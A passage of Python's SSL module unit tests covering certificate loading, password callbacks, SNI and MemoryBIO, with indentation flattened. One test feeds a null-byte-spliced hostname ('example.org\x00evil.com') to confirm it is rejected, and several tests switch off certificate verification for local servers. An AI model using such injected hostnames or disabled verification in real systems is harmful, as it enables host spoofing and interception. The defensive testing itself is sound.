ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(
ssl.SSLError,
"no start line: cadata does not contain a certificate"
):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(
ssl.SSLError,
"not enough data: cadata does not contain a certificate"
):
ctx.load_verify_locations(cadata=b"broken")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
for proto in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': 'Mar 29 12:29:49 2033 GMT',
'notBefore': 'Mar 30 12:29:49 2003 GMT',
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(
ssl.PROTOCOL_TLSv1_2,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True
)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1_2)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(), server_side=True)
self.assertIsInstance(obj, MySSLObject)
def test_num_tickest(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.num_tickets, 2)
ctx.num_tickets = 1
self.assertEqual(ctx.num_tickets, 1)
ctx.num_tickets = 0
self.assertEqual(ctx.num_tickets, 0)
with self.assertRaises(ValueError):
ctx.num_tickets = -1
with self.assertRaises(TypeError):
ctx.num_tickets = None
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.num_tickets, 2)
with self.assertRaises(ValueError):
ctx.num_tickets = 1
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.create_server(("127.0.0.1", 0)) as s:
c = socket.create_connection(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
def test_unwrap(self):
client_ctx, server_ctx, hostname = testing_context()
c_in = ssl.MemoryBIO()
c_out = ssl.MemoryBIO()
s_in = ssl.MemoryBIO()
s_out = ssl.MemoryBIO()
client = client_ctx.wrap_bio(c_in, c_out, server_hostname=hostname)
server = server_ctx.wrap_bio(s_in, s_out, server_side=True)
# Loop on the handshake for a bit to get it settled
for _ in range(5):
try:
client.do_handshake()
except ssl.SSLWantReadError:
pass
if c_out.pending:
s_in.write(c_out.read())
try:
server.do_handshake()
except ssl.SSLWantReadError:
pass
if s_out.pending:
c_in.write(s_out.read())
# Now the handshakes should be complete (don't raise WantReadError)
client.do_handshake()
server.do_handshake()
# Now if we unwrap one side unilaterally, it should send close-notify
# and raise WantReadError:
with self.assertRaises(ssl.SSLWantReadError):
client.unwrap()
# But server.unwrap() does not raise, because it reads the client's
# close-notify:
s_in.write(c_out.read())
server.unwrap()
# And now that the client gets the server's close-notify, it doesn't
# raise either.
c_in.write(s_out.read())
client.unwrap()
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
self.server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.server_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=self.server_context)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
s = ctx.wrap_socket(
socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME
)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_sni(self):
host, port = self.server_addr
server_names = []
# We store servername_cb arguments to make sure they match the host
def servername_cb(ssl_sock, server_name, initial_context):
server_names.append(server_name)
self.server_context.set_servername_callback(servername_cb)
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=SIGNING_CA)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port, pem))
self.assertEqual(server_names, [host, host])
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_get_server_certificate_timeout(self):
def servername_cb(ssl_sock, server_name, initial_context):
time.sleep(0.2)
self.server_context.set_servername_callback(servername_cb)
with self.assertRaises(socket.timeout):
ssl.get_server_certificate(self.server_addr, ca_certs=SIGNING_CA,
timeout=0.1)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
